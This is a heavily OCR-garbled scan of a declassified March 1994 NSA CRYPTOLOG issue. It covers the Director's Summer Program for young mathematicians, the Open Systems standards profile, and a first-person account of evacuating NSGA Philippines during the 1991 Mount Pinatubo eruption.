exceptional olderoryoungerundergraduates andhighschoolstudentsmaybeconsidered.
DSP'sBeginning: 1990
(U)Evenbeforetheevidence ofdeclineinmathe­
maticsresearch andeducation wassoprominent onthe
frontpages,NSAmathematicians wereawareofitand
weretryingtodosomething aboutitthroughanumber
ofgrass-roots efforts.Withtheausterityweface,weare
notgoingtobeabletosurvivebeyondtheninetieswith
business asusual.Wearegoingtohavetoscourthe
nationforthebestmathematicians wecanfind.InOcto­
ber1989theAgencybegananenergetic program to
seekouttopyoungundergraduates whoshowedgreat
promiseandinterestinmathematics andexposethemto
ourexcitingproblems. Manythoughtweweredoing
thisasalong-term recruiting program. Indeed,wewere
recruiting, butformathematics, notforNSA.Ourinter­
estandintentwastouseasummerexperience withus,
togenerate evidence thatmathematics provides both
subjectmatterandtrainingforchallenging careers. We
hadhopedforafewmorestudents, butwewerepleased
thateightwereabletostickitoutthroughtheprocessing
andcome,becausetheywereeightveryspecialyoung
people.
(U)Wewerehopingthatwecouldputtheseeight
youngpeopleinaroombythemselves, working onour
bestproblems, sothattheexperience wouldbestrongly
peer-interactive. Butsuchanaggressively structured
experience couldbepulledoffonlyifourtopmathema-hClanstookonresponsibility fortechnical direction.
Thefirsttwomathematicians thatweaskedtoleadthe
12-week 1990DSPnotonlysaidyes,buttheyworked
hardduringthespringtoprepareforthestudents, identi­
fyinganddeveloping thebestproblems topresentto
them.
(U)Thefirsttwoweeksofthe1990DSPwere
extremely difficult, forboththetechnical directors and
thestudents. Thestudentshadtolearndecadesofclas­
sifiedcryptologic mathematics intwoweeks,aswellas
amyriadofdetailsaboutthefourproblems presented to
them.Duringthesetwoweeks,somelearnedtopro­
gramforthefirsttime.Allwereproficient programmers
bytheendofthesummer.
(U)Bythethirdweek,thestudentskneweverything
therewastoknowabouttheproblems, haddeveloped
intooverlapping groups,andknewNSAslangandjar­
gonsowelltheysounded asiftheyhadworkedforus
for10years.WehadfiveSunterminals connected to
theCrayintheroomfortheeightstudentsandtwotech­
nicaldirectors, butwehadtoaddthreemoretermi­
nals.Thestudentsmadesubstantial contributions toall
theproblems theyworkedonandevencameupwith
innovative waysoflookingatourproblems.
TOPS~CRET Ul\fBRA
1

DOCID: 4009689.........".............. ~.....",n,1"" IVL.V~
March 1994'fOPSECRE'I' UM~RA £01.4. (c)
P.L.86-36
(U)Onthefifthandtenthweeks,theDSPstudents
obtained veryimportant resultsbysubstantially solving
twooftheproblems, convincing thelastoftheskeptics
thatthisprogram wasveryworthwhile. Therealpayoff
wasnotthecontribution toourproduct, impressive as
thosecontributions were;therealpayoffwasthepipe­
line.Incredibly, beforetheymetus,twoofourDSPstu­
dents,juniors, hadnotbeen'planning togoonto
graduate schoolfollowing theirsenioryear.Thesetwo
wereperforming exceptionally wellintheircurrent,
demanding academic programs and,ironically, madethe
mostdirectcontributions tothemostsignificant results
oftheworkshop. OnewenthomefromtheDSP.witha
surgeofconfidence, appliedtoallthetopgraduate
schoolsandisnowinaPh.D.program onafellowship.
TheotherwishedtobecomeanNSAemployee, butwe
talkedheroutofjoiningusrightaway.Shetookallpure
mathematics courseshersenioryearandisnowingrad­
uateschoolinaPh.D.programonafellpwship.
EO1.4.(c)
P.L.86-36
DSP1991
~The 1991DSPwasalsoverysuccessful. Withthe
1990success, itwaseasytorecr\litthreetoptechnical
directors. Theyledalargergroupofparticipants,
including some1990returnees, tocomplete solutions of
threeproblems andsignificant resultsonfourothers.
Wehad20Sunterminals forboththetechnical directors
andforthisgroupof13brightyoungmathematics stu­
dents,whichincluded twograduate students, four
beginning graduate students, threeseniors,twojuniors,
andtwosophomores. Eightproblems werechosen,
fromZ,C6,R2andWandpresented tothestudents. By
andlarge,theproblems werequitedifficult. Neverthe~
less,significant progress wasmadeonseveralofthem.~Success wasalsoachieved ontheCOMSEC
problemI
L...-_....I1Inaddition, important progress wasmadeonthe
Wproblem. Allbutoneofthesubmittedproblems were
addressed andtwoorthreeadditional shortproblems
wereintroduced.
~Threetechnical directors andthreeproblem support­
erswereonhandforthe1991session.Theparticipation
oftheseagencymathematicians wascrucialtothepro­
gram'ssuccess. Anoverview of30yearsofcryptologic
mathematics was'distilledintothefirsttwoandone-half
weeks.Concurrent withtheseintroductory talksonthe
problems andcertaintopicsincryptanalysis, thestu­
dentsselected aproblem orproblems (mostsettledon
oneortwo)andworkedindividually, ortogether, or
withoneoftheNSAmathematicians towardsasolution.
(U)AseriesofWednesday "progress reports" washeld
inwhichstudents wouldpresentworkinprogress, par­
tialsolutions. difficulties encountered, etc.Thesetalks
wereattended byinterested personnel fromaroundthe
Agency.Itwasfoundthattheseprogress reportswere
valuable tothetechnical directors, technical support
personnel, outsidelisteners, andstudentsalike.
(U)Attheendofthe1991DSPsession,someofthestu­
dentsgavetalksontheirworktoaudiences inZ,C6,and
R51.Threeofthestudents wroteR51mathematics
papersktheirwork.InOctober 1991 ~IIlhi(':f R51,briefedthefinalreportontheDSP
for1990and1991totheDirectorNSA.
2/
EO1.4.(c)
P.L.86-36TOPSECRETmmRJ .. P.L.86-36

DOCID: 4009689TOPSECRET lH\;i-BRl ..
CRYPTOLOG
March 1994
DSP1993
EO1.4.(c)
P.L.86-36
(T~C)Thesummerstartedwiththeusualcourseon
cryptologic mathematics andthepresentation ofthe
problems. Oncethestudentssettleddowntoworkthere
wasnostopping them.Thefirstsolutioncameinthe~Thegroupof17newstudentsgathered forthe1993
DSPsetanewstandard whichwillbedifficult to
exceed.Nineproblems werepresented tothegroupand
allbutonereceivedattention. Thegroupmetinanew
roomintheR&Ebuilding which was especially
designed fortheDSP.Eachstudentandeachofthefour
technical directors hadaSUNworkstationtiedintoa
CRAYcomputer. Theroomislargewithampleblack­
boardspaceforlecturesanddiscussions.DSP1992(U)Wecansaywithoutreservation thateveryoneofthe
thirteenstudents ofthe1991DSPleftNSAabetter
mathematician thanwhenheorshearrived.Eachdevel­
opedaperspective ofhowmathematics canbeusedto
createanddestroy,towinandlose,andtosucceedand
fail.Theysawhowtheircountryneedstheirskillsand
theycametoappreciate howthesesameskillscanbe
usedasapotentweaponagainsttheircountry.
(U)The1992DSPsessionclearlyeclipsedthesuccess
oftheprevious twosummers intermsofattracting its
mosttalentedgroupofyoungmathematicians andsolv­
ingcryptologic mathematics problems. Wehadan
excitingsetoftop-notch applicants forthe1992DSP.
Thiscanbeattributed totheNSArecruiting process
whichhashelpedtogenerateaveryimpressive groupof
morehigh-caliber students thaninprevious years.
Thus,thisthirdannualDSPbroughttogether16match­
lessmathematics students forthe12-week session
whichcommenced on 3June1992.Threetechnical
directors provided full-time mathematical support,and
21Sunterminals wereusedinthisyear.Ofthe16DSP
participants, 13werefirst-timers and3werereturnees.
(5CeO)Asbefore,thefirstoneandone-halfweeks
consisted ofcryptanalytic orientation andworkshops,
comprehensive programming inC,andlecturesonclas­
sifiedmathematical techniques. Theweekof15June
focusedonproblempresentations. Eightdifficultprob­
lemswerechosenfromZ,W,C61,R21andR51.\
DSP'sFuture
(U)Forthelatter,theteamworking onGolomb's Con­
jecturesuccessfully programmed asophisticated algo­
rithmforgenerating allsequences withthedesired
properties andtestedtheconjecture ontheoutput.Their
resultswillappearinanoutsidetechnical journal.
EO1.4.(c)
P.L.86-36i€TWehopeausterity willnotdiminish ourabilityto
continue thisprogram andattractoutstanding summer
employees. Theneedforbrilliantyoungmathemati­
cians will onlyincreaseascryptology andcryptanalysis
becomemoreandmoremathematical. Weneedtoculti­
vatedeeprootswithintheacademic mathematics com­
munityandestablish anetworkofacademic consultants
whounderstand ourmission.
(U)AllthismakestheDirector's SummerProgram even
moreimportant andtimely.
TOPSECRE'f' Ui'+fBRA
3

DOCID: 4009689"1""lJl"""'r"'. "",..."1""11 r-IU~VU
March 1994FOROFFICII ..LUSEONL¥
OPENSYSTEMS:
I I
A7Architecture andPlanning BranchWhatDoesitReallyMean?
P.L.86-36
Askanydozenpeoplewhattheterm"OpenSys­
tems"meansandyou'relikelytogetadozendifferent
answers. Someinterpret "open"veryliterallyandpre­
sumethattheycanbuildanopensystembythrowing
together anymixofcommercial products andvoila!
theyhaveone.Attheotherendofthescale,some
equateopensystemswithparticular products andbrand
names."Open"isconfusing atbestbecauseopensys­
temsreallyaren'topenatall.Afarmoreaccurate
expression is"Standards-Based Systems" sinceopen
systems arebasedonopenstandards, andstandards
implyrestrictions.
Forinstance,thespecification foranelectricoutlet
isanopenstandard. Theavailability ofsuchaspecifica­
tionallowsanyentrepreneur toproduceelectricoutlets
forpublicconsumption atareasonable cost,andallows
otherstoproducecomponents whichworkinconcert
withthem;mostnotablyelectricplugsattached toelec­
tricappliances.
Thesamegeneraldefinition ofopenstandards
appliestothecomputing world.Themostvisibleexam­
pleofanopencomputing standardistheIBMPChard­
warespecification. WhenIBMreleasedthePCinthe
early1980s,theydidsomething unprecedented (for
thematleast).Theyreleasedthehardware specification
tothepublicinordertoencourage entrepreneurs to
developproductsfortheirmicrocomputers. Theresult
wasarevolution thatspawned anentireindustry and
madedesktopcomputers asfamiliartotheaverage
American asatelevision set.
Anotherprominent exampleofanopencomputing
standard istheXlWindows specification. Developed
andrefinedalmostcompletely inanacademic environ­
ment,ithashadaprofound influence onourcurrent
viewofcorporate computing. TheXlWindows specifi­
cationisavailable fromtheMassachusetts Instituteof
Technology (MIT)forthecostofthemediumonwhich
it'sdelivered, oralternately thecostofthephonecall
requiredtodownload itfromtheInternet.
Openstandards, bydefinition, aresupposed tobe
non-proprietary. Thismeansthatnoindividual ororga­
nizationholdsexclusive rightstospecifications adopted
asopenstandards. Butthefactthatthestandards are
publiclyavailable doesn'tnecessarily meanthattheyareinthepublicdomain. Formalspecifications areoften
protected bycopyright, andtheproductcharacteristics
theydefinemaybeprotected bypatent.Therefore, the
existence ofanopenstandarddoesn'talwaysimplythat
youcangetitanduseitfornothing. Accesstothespec­
ification anditssubsequent usemaybecontingent on
payment ofalicensefeeorroyaltyofsomesort.Note
thereisnothingintheDoDorNSAopensystemsstan­
dardsdocumentation thatstatesthatallopenstandards
specifications aretobeavailable atnocost.
Torecap:firstofall,whenweusetheterm"Open
Systems" we'rereallyreferring tostandards-based sys­
tems.Thosesystemsarebasedon"openstandards"
whichareavailable tothegeneralpublic,buttheiruse
mayhavesomestringsattached suchasroyalties or
licensefees.Withthatunderstood, wecanmoveonto
therealissue,whichis:
What"OpenSystems" means
tothetypicalNSAemployee
•Tocomputer users,itmeansmorerobustsoft­
warewithaconsistent "lookandfeel,"more
effective ADPsupport,andmorerapiddeliveryof
essential capabilities andservicesatloweroverall
cost.
•Toacquisition planners andmanagers, itmeans
thatatlonglastthereareconsistent metricsby
whichproposed hardware andsoftware acquisi­
tionscanbeevaluated for"goodness offit"inthe
NSAcomputing environment
•Tocomputer system developers, itmeansthat
therewillbeastable,predictable, andconsistent
hardware, software andcommunications baseline
available tothembecauseeveryone isplayingby
thesamerules.Themostobviousbenefitstobe
realized bydevelopers insuchanenvironment
are:vastlyimproved opportunities forsoftware
component re-use,significantly reduceddevelop­
menttime,anddramatically reduced support
costs.Italsoopensthedoortoeffectivesharingof
resources acrossorganizational boundaries.
FOROFFICIAL USEONLY
4

DOCID: 4009689FOR OFFICI.~L US~ONIX
CRYPTOLOG
March 1994
Ourcomputer usersarethebigwinners
because, byconfonning toaglobally accepted setof
specifications forhardware, software, andcommunica­
tions(i.e.,opensystemsstandards), it'sfarmorelikely
thatanygivenapplication willhavetobewrittenonly
oncewithfullconfidence thatitcanbeeasilymovedto
anyotherplatform whichprovides thesamespecified
servicesandinterfaces. Notonlythat,butalsomanyof
theformerly "error-prone" partsofsoftware develop­
ment,likeprogramming forcommunications andgraph­
ics,canbeminimized throughre-useofhighlyreliable
"canned" components. Sincesuchfunctions arefunda­
mentally thesameoneverycomputer becauseofinher­
entportability, userswillbeabletomovefromone
confonning systemtoanother(evenonadifferent ven­
dor'shardware) andperformthesamewithoutculture
shockorretraining.
Obviously, it'simportant duringtheprocessof
selecting components fornewsystemsto beabletostick
exclusively withproducts whichconform tothestan­
dards.However, it'smoreimportant tounderstand not
onlythebasiccharacter, butthelimitations ofthestan­
dardsaswell,because thereareveryfewstandards­
basedproducts onthemarketwhichreflectaone-for­
onemapping ofstandards specifications tofeatures.
Vendorsmaketheirstandards-based products desirable
byaddingattractive bellsandwhistleswhichmaketheir
products easiertouseormorepowerful thantheircom­
petitors'. It'sthesevalue-added featureswhichsome­
timestendtolockusintospecific vendors and
eventually make interoperability andportability of
applications difficult. Knowledge ofthestandards
allowscomputer systemdevelopers toavoidproduct
featureswhichjeopardize portability andinteroperabil­
ity,orallowsthemtoatleastassociate somedegreeof
riskwiththosefeaturesshouldadecision bemadeto
takeadvantage oftheminanoperational application,
Caveatemptor!
P.L.86-36Insummary, "OpenSystems" issimplyanother
wayofreferring tostandards-based systems.Itisessen­
tialtoremember thatstandards arespecifications and
notproducts. Itisequallyimportant toremember that
standards donotcarrytheforceoflaw.Rather,theyare
guidelines tobefollowed.Ifthestandards inhibitget­
tingthemissionaccomplished orblowthebudget,the
non-standard specifications arethecorrectchoice.
Therewardsforfollowing OpenSystems Stan­
dardswillbeasignificant improvement inthewaywe
design,develop,andsupportsystems,moreproductive
users,andreducedcostateverystepoftheacquisition
andsupportcycle.TheNSAstandards baseline isthe
NSAOpenSystemsStandards Profile,whichisanadap­
tationofDoD'sstandards-the CenterforInformation
Management's Technical Reference Model (CIM
TRM).
Thesuccessofthewholeopen-systems venture
depends onthewillingness ofvendorsanddevelopers to
buildproducts whichconform ascloselytothestan­
dardsaspossible.Italsodependsonthewillingness of
acquisition officials,fromdivisionlevelonuptothekey
components, tosupportthepurchase ofthoseproducts
whichconform tostandards, withfullawareness that
doingsomaysometimes meansacrificing powerand
convenience infavorofportability andinteroperability.
That,inanutshell, isaviewofOpenSystems.
Anyone interested ingettingacopyoftheNSAOpen
Systems Standards Profile,inlearningmoreaboutOpen
Systems atNSA,orbecoming activelyinvolved inthe
OpenSystems implementation processshouldcontactI Ithechairman oftheNSAOpenSystems
Working Group.Kencanprovideinformation onDoD
andindustry standards effortsandcanpointyoutoward
sources ofinformation andworking groupsalready
involved informalizing anNSAOpenSystems imple­
mentation process.HemaybereachedviaNSAe-mail
bysendingamessagel I
FOROFFICIAL USEONLY
5

DOCID:4a096a1ECRE'ffIIANBLE VIAcoPtHN'f CIIANNELS ONL¥
CRYPTOLOG
March 1994
TheelMTRMandtheNSAProfile
I I
A7Architecture andPlanning BranchP.L.86-36
(U)Anopenstandard isbasedonwidelyrecog­
nizedandusedspecifications whichareinthepro­
cessofbeingmadeintoformalstandards, orwhich
havealreadybeenformally adoptedasstandards by
groupsliketheAmerican National Standards Insti­
tute(ANSI)ortheInternational Standards Organiza­
tion(ISO)andcatalogued bytheNational Institute
forStandards andTechnologies (NIST).
(U)AtthesametimeNSAwantstoreduce:
•dependence onvendorsbyacquiring ordeveloping
interchangeable, non-proprietary software;
•life-cycle supportcostsbyeliminating duplicate devel­
opmentefforts,improving maintainability, andimprov­
ingtraining.•manageability ofsystemsandresources bysimplify­
ingdevelopment andacquisition processes.•userproductivity withaconsistent userinterface,
intelligent integration ofapplications, corporate data
sharing,andconsistent securitycontrol;
•developer efficiency withmorecommon development
effortsforproblems, providing astandards-based infor­
mation-processing environment Thebestwayto
improvedevelopers' efficiency iswiththeuseofCom­
mercialOff.:the-Shelf (COTS)andGovernment Off-the­
Shelf(GOTS)software, settingupmechanisms forcom­
ponentreuseandresource sharing; •
•application portability fromonetypeofcomputer to
anotherandscalability (fromonesizetasktoanother)
throughattention tostandards andadeliberate effortto
addressthelargestnumberofcomputers possible;
•opportunities forinteroperahility ofsystems and
applications throughacommon, standards-based com­
munications andcomputing infrastructure andcommon
services; and(U)Through judicious application ofappropriate
standards, theAgencyhopestoimprove:
(U)ThepurposeoftheNSAStandards Profileisto
providetheguidelines forthatstandards-based architec­
ture.Ratherthanalistof"mustdo"actionsand"must
use"products, ittalksaboutwhatthestandards are,
whichonesarecurrently fullyenoughdeveloped tobe
widelyandmosteasilyusedandwhichonesweare
lookingatforthefuture.TheProfilealsotalksabout
ourlegacysystems. Whilethosesystemshaveserved
well,theydonotandoftencannotsupportourneedto
movetowardanopensystemsenvironment.WhyDoesNSAWanttheProfIle?
~ver 75percentofthetotalcostofanycomputer
systemmadetodayisformaintenance. Thelion'sshare
ofthatcostisforsupportpersonnel. AtNSAtoday,
thereisaboutoneidentified computer supportperson
forevery8-10computers. However, thatratioisunder­
stated.Therearealotofcomputer gurusworkingunder
non-computer COSCswhospendmostoftheirtime
doingcomputer supporttasks.WithNSAbeingtold
everyyeartojustifyitsbudgetusingevermorerestric­
tivecriteria,thishastochange. Whatisneededisa
strategywhichreducesthesupporttail.Adoption ofa
standards-based architecture canprovidethefoundation
forsuchastrategy.What'sinitforNSA?Whyarewecooperating withtheDoDCorporate Information Management (CIM)Office?
(U)TheCIMTRM(Technical Reference Model)is
thestatement ofitsopen-systems standards available. It
describes theentireopencomputing environment (Le.
hardware, operating systems, communications, etc.)in
termsofstandards. Theintentistocreateaset"Ofstan­
dardsthatDoDcanusetoincreaseitsbuyingpower,
decrease thecostofwhatitbuys,andgiveDoD-more of
avoiceinthedevelopment offuturecomputer products.
NSAisworkingonadapting theCIMTRMtomeet
NSA'sneeds,notbecauseofaDoDrequirement, but
basedonourself-interested desirefor·aframework of
specificstandards whichwillletusbuyhardware, soft­
ware,andintegrated systemsthatwillworktogether
withaminimum oftinkering andthatwillcontinue to
worktogetherwithoutconstant pampering. TheNSA
adaptation oftheTRMisknownastheNSAOpenSys­
temsStandards Profile,or"theProfile"forshort.
SECRE'ffiIANBLE VIACOfltltN'f ClIANNELS ONLY
6

DOCID:4a09689 SECREfflIANBLE VIACOt\UNT CUANNELS ONLY
CRYPTOLOG
March 1994
WhatNeedstobeDone?
P.L.86-36(U)Agency seniorspersonally supported and
directedtheProfile's development bycreatinganall­
seniorsNSAOpenSystemsSteering Group(NOSSG).
Intum,theNOSSGselectedmission-critical ADPper­
sonneltochairandstafftheNSAOpenSystemsWork­
ingGroup(NOSWG). Subgroups consisting ofexperts
fromallrelevantkeycomponents werethenformed:
Programming Services classified existingandpro­
posedprogramming languages according totheir
conformance toANSI,ISO,andPOSIXstandards.
UserInterface Services standards describehowa
userwillinteractwithacomputer's programs, espe­
ciallythegraphical displayofinformation. NSA
willusetheXWindow standard andtheDoD
Human-Computer Interface StyleGuide.
DataManagement Services: standards, fordata­
basedesigners mostly,describe howdatawillbe
stored,accessed, modified andloaded.
DataInterchange Services: anothersetofstan­
dardsmainlyfordatabase designers, dealingwith
dataexchange formats, fromsoftware package to
softwarepackage.
Multimedia Standards: dealwithhowmultiple
typesofinformation (text,audio,pictorial, tactical,
etc.)willbepresented, edited,orintegrated.
Network Services: howcomputer hardware and
relatedcommunications netswillworktogetherto
deliverinformation andoperate.
Operating System: thebasicpackage ofinstruc­
tionsthatturnsadelicately carvedpieceofsandinto
adevicethatcanprocessinformation. NSAhas
selectedPOSIXasitsfuturestandard operating sys­
tem.
Security Services: interacts withalltheotherstan­
dardstoinsurethatdatawillbeaccessible onlyto
authorized individuals, andthatdatawillnotbe
maliciously oraccidentally destroyed orcorrupted.
Management Services: forsoftware toolsusedto
keepsoftware, hardware andnetwork communica­
tionssystemsworkingandproductive.
Real-Time Services: forsystemsthatneedtocol­
lect,process,orevaluateinformation asitisoccur-
~ I(U)Next,animplementation mechanism wasbuilt
fortheProfile.TheNSAOpenSystems Standards Pro­
filewillbeimplemented byatransition planprepared as
anaccompaniment totheprofile.Itprovides aroadmap
forgettingfromwherewearetodayintermsofour
computer capabilities towhereweexpectwewillneed
tobeinthefuture.Thismeanstheplanwillprovidefor
compatibility testingandinformation dissemination;
createamechanism forprojecting futurerequirements;
andforinvestigating newstandards andproducts tosat­
isfyfutureneeds.
(U)Creating awayofdiscussing andclassifying
existingstandards tookalotoftime.Butthisclassifica­
tionsystemwillallowdevelopers andmanagers to
understand howmuchrisktheyaretakingwhenselect­
ingstandards foraprojectandthevariousproducts that
usethatstandard. TheProfiledoesthisbybreaking
standards intosixlevels:
1.Now:aproductconforming tothisstandard can
befreelyused.Theinvestment riskofusingaprod­
uctmeetingthisstandard isminimal.
2.Now:aproductconforming tothisstandard can
beusedwithpriorapproval. Theinvestment and
riskofusingaproductmeetingthisstandard mustbe
considered. Also,thestandard maynotbeinline
withestablished guidance.
3.Future: aproductconforming withaproposed
standard canbeusedwith prio~approval. Thestan­
dardisstillmovingtowardapproval, canstillchange
unpredictably, andsolongterminvestment risk
exists.
4.Gap:norecognized standards existforthiscapa­
bilityorproductavailability islimited. Theriskof
usingsuchaproduct ismoderate tohighand
requirespriorapproval.
5.Void:whileNSAhopesstandards willemergein
thefuture,nonehaveyet.Theriskofusingsucha
productisextremely high.Sinceproducts inthis
areahavenostandard, theiruseisdiscouraged.
6.TBD:astandard hasbeenproposed, buteither
hasnotbegunevaluation orisintheearlystagesof
beingevaluated. Sinceverysubstantial changescan
occur,therisklevelishighandpriorapproval isrec­
ommended.
7

DOCID:4aa9 6~tglCIffi'fffIANDLE VIACO~lfN'f' CHANNELS ONLY
,..nvn ....""'."'".""'rI"""'~'"'~March 1994
.L.86-36
HowWilltheProfileAffectYou?
(U)TheNSAOpenSystems Standards Profileis
designed tobealivingdocument providing advice-not
guidance-about openstandards ratherthanproducts.It
isintended tobeperiodically updatedasthetechnology
changes.ItisNSA'sresponse tothechallenge notjustof
theDoD'sCIM-but moreimportant, tothechanges
thatareaccelerating astheInformation Agefinallycommunications system.(i"OUO, Somegroupswillbenefitimmediately,
whileothergroupswillseenochanges orbenefits.
However, overtime(ataguess.fivetotenyears)every­
onestandstobenefit.Examples are:theAgencyneeds
toconstant! udatethecomutersweuseandth
movesbeyonditsbarestbeginnings. Withinfifteen
yearsNSAmusteitheradapttothatage'srequirements
ordie.Theadaptation processwillrequireawholesale
reinvention ofNSA;theProfilewillbeoneoftheguide-
postsofthatprocess.
\(U)Infonnation ontheAgency's opensystems
effortsisavailable inNetNews undertheheadingof
org.noswg. Thiscontains theminutesofNOSWG
meetings, andNOSWG subgroup meetingnotesand
1\\wOrkin gdrafts.
\\
~I
IEO1.4.(c)
IThesolutiontotheseconcerns that P.L.86-36
theProfileencourages istodecrease thecostofour
equipment purchases byadhering toDoDandgovern­
ment-wide standards while using oursoftware-develop­
mentresources forproblems thatneedtobesolvedona
customortime-critical basis.Thisbenefitsanalystsby
freeingupmoreprogrammers toperformsoftware work
forthem.Computer professionals willbenefitbyhaving
moretimefordeveloping software foranalysts and
needingtospendlesstimemaintaining existingsystems.
~Iinitiallybenefited noone.Ittied
almostnoonetoalmostnothing. Butithassince
become invaluable. Itdelivers information electroni­
cally,endingthedrudgery ofsortingoutthemailtwicea
day.Also,youcannowsende-mailtoapersoninstead
ofspending daysplaying"telephone tag."
P.L.86-36
SECRETJUANDLE VIACO~HNT CIY...NNEL8ONIX
8

DOCID: 4009689FOROFFICIAL USEONLY
CRYPTOLOG
March 1994
TheClosingofNSGAPhilippinesP.L.86-36
______ 1USN
Thisarticleisdedicated toallthosepersonswhoperished asaresultoftheeruptionofMountPinatubo Volcano.
ItbeganinFebruary 1991.Avolcanowhichhad
remained dormant forover600yearswasnowshowing
signsofcomingbacktolifeagain.Although noone
couldhaveforeseen theextenttowhichMother
Nature's furywouldbecastupontheRepublic ofthe
Philippines inthemonthstofollow,itbeganwitha
seriesofwhatseemedtobeinnocuous ventingsofsteam
fromthedepthsbelow.ByearlyMarch1991,enough
venting hadoccurred towarrant someprofessional
investigation andanalysis. Severalvolcanologists and
seismologists arrivedonislandtodetermine theextent
oftheactivity. There,scientific readings andmeasure­
mentstoldthem that themountain wascapableoferupt­
ingwithintwelvemonths.
Withthisinformation, ClarkAB,locatedapproxi­
mately9milesfromthevolcano, soonbeganpublishing
information inordertopreparethebaseforapossible
evacuation. Aplanwasquicklyputtogether byon6
June1991,whentheeruption ofMountPinatubo was
almostareality.
Whileeachtenantcommand aboardClarkAB
passedontheseismological information toitspeople,
NSGAPhilippines hadbeenworking morediligently on
adifferent approach. Specifically, aplantoclosedown
thecommand, whichhadbeendraftedsometwelve
monthsearlierintheeventthebasenegotiations with
thePhilippine government wereunsuccessful, hadbeen
dustedoffandexamined. Theplanessentially listedall
thoseactionsnecessary tocloseanddisestablish acom­
mand.Its180-day timeline wasmerelymodified into
separate 3-day,7-dayand30-dayactionprocesses,
depending entirelyuponMotherNature's cooperation,
ofcourse.
AsIrecall,on9June1991wordhadquicklyspread
thatthemountain couldblowwithinamatterofdays.It
wasventingmore,andthecolorofthesteamhad
changed fromapurewhitetogreywithinthepastfew
days.Ventingcouldnowbeseenfromdifferent sections
ofthemountain aswell.
At1700hourson9June1991,anemergency recall
ofNSGAPhilippines wasordered. Allleavewascan­
celled.Theskipperbriefedusonthelatestscientific
findings, whichconcluded thattherewasagoodchancethevolcano woulderuptwithin48hours,andthata
decisiontoevacuate ClarkABcouldcomeasearlyas
0500thenextmorning. Thethemewas"don'tpanicbut
beprepared togo."Earlierthatweekalistofitemsthat
shouldbereadiedincaseofanevacuation wasprovided
toeachpersonandfamilyaswellasbeingposted
throughout thecommand. Alsoduringtheprevious
week,information concerning lodging, transportation,
food,andahostofotheritemswassimilarly dissemi­
nated.
With100percentofthecommand recalled, aPhaseI
(precautionary emergency destruction) wasorderedby
theCommanding OfficerandpassedontotheCDOto
carryout.Forseveralhoursanduntilalmostmidnight
on9June,wedestroyed asmuchclassified information
aswecould.Whathadbeenanotherwise quietweek­
endwithintheoperational spacesofNSGAhadturned
intoacommand-wide emergency destruction operation
withinamatterofhours.Whatwecouldnotdestroy
underPhaseI,andallPhaseIIandIIImaterial, was
boxedup,double-wrapped, andwouldeventually be
couriered toSubicBayNavalStation,whichwasdesig­
natedastheevacuation safe-haven site;weintended to
returntoClarkaftertheeruption .•
At0500on10June,theordertoevacuate ClarkAB
came.Allpersonnel, lessafive-man closureteam,mus­
teredontheflightlineaspreviously instructed. Within
afewhours,aconvoyofsome25,000military, civilian
anddependent personnel wereontheirwaytoSubic
Bay,some35-40rnilesaway.Thetriplastedapproxi­
matelyfivehours,andeveryone arrivedsafely.The
five-man closure teamfromNSGA Philippines
remained behindtocontinue thedestruction ofclassified
material andthepowering downofelectronic equip­
ment.
Withoutlightsandwithflashlights inhandwecon­
tinuedtocheckeachsafe,desk,andcabinetforclassi­
fiedmaterial. Whatlittlewedidfind,wedestroyed.
However, owingtothesheervolumeofpaperproducts
inthebuilding, itwasclearthata100-percent sanitiza­
tioncertification couldnotbegivenunlessallpaper
productsweredestroyed.
FOROFFICIAL USEONLY
9I
J

DOCID: 4009689""...".....""."",..."",,.IVI.V~
March 1994
TheFirstEruptionFOROFFICIAL USEONL¥
On12June1991at0700thefiveofuswhoconsti­
tutedtheclosureteamonceagaindeparted thebarracks
fortheOperations Building tocontinue oursearchfor
classified material. Armedwithourflashlights and
radios,wecontinued thesearch.At0848,however, a
callfromAlphaAlpha(theCO)wasreceived. "Thisis
AlphaAlpha,majoreruption, getoutofthebuilding. "
Instinctively, Ibegantostuffthebum-bags backintothe
safeandhadplannedonsecuring thesafe.Thistook
approximately 45seconds. Mysecondthoughtwasto
callSubicBayandadvisethemtheeruption had
occurred andthatwewereevacuating. Bythistimea
secondcallfromtheradiowasheard:"Majoreruption,
getoutofthebuilding NOW!!" Notknowing theextent
ofthe"eruption" andwhetherornotthepyroclastic flow
wouldreachthebase(whichreportedly travelled ata
rateof125milesperhour),norwhatIwouldfindonceI
gotoutsideofthebuilding, Iwasdetermined tonotify
NSGDSubicbeforeIexitedthebuilding.
AfterIsecuredthematerial, Iran,flashlight inhand
tooneofonlytwophonesworkingintheOperations
Building. Thebuilding wascompletely darkand
smelledofmust.Bythistime,approximately onetoone
andahalfminuteselapsedsincethefirstradiocallfrom
AlphaAlpha.JustasIbegantodialSubic'stelephone
number,Ireceived(inamuchmoredirecttone)another
callfromAlphaAlpha,whichmeantthatifIknewwhat
wasgoodforme,Iwouldgetoutofthebuildingnow.I
didjustthat.
Uponrunning outoftheOperations Building, I
lookedtomystarboard side.Iwasinawe!Whathad
formonthsbeenasteamventing"hill"hadtransformed
itselfintoamonstrous greyplumerising88,000feet.It
lookedexactlylikeanucleardetonation. Thesurprising
thingwasthatitmadenonoiseatall.
Ireachedthevehicleparkedoutsidethegatewhere
theskipperandtheotherthreewerewaiting,motioning
metohurry.Wedeparted forthebarracks approxi­
mately1/4mileawaytopickupourbags.Withsirens
blaringweretrieved our"gobags"andheadedtothe
flightline(theprimaryevacuation point).Uponarriving
attheflightlineabout10minuteslater,wesawthe
plume,whichatonepointappeared tobeovertaking the
base,nowseemedtoberetreating intheopposite direc­
tion,owingtoashiftinthewind.Inanycase,anorder
toproceedtothesecondary evacuation pointwasgiven
andwedrovethroughtownapproximately 10milesto
MountArayat. Therewewaitedapproximately five
hoursbeforereceiving theall-clear signwherewereturnedtoClarkAB.AsIfoundoutlater,weevacu­
atedtoMountArayatbecauseoftheuncertainty ofthe
pyroclastic flow.
Theskipperdidn'tgotoMountArayat;heandLt.
Col.Hurst,Commander oftheUSAFESSelementat
ClarkAB,remained onthebase.Weeventually metup
withhimwhenhedecidedtoleaveClarkandproceedto
Subic.Itwasjusttoodangerous tostay.Soat1800
hourson12June1991,thefiveofusdeparted ClarkAB
forwhatwethoughttobethelasttime.
WearrivedinSubicBayat2145thatevening, met
bytheOIC,XO(Lt.Cdr.KeithLudwig) andtheCDO.
Berthing arrangements weremadeinadvance andwe
calleditquitsfortheevening.
Thenexttwodayswerespenttryingtokeepa137­
manorganization anditsdetachment ofapproximately
50sailorstogether, fed,andinformed. Additionally,
destruction oftheclassified material transported from
ClarktoSubiccontinued. Thistime,however, theCom­
manding Officerorderedafullemergency destruction of
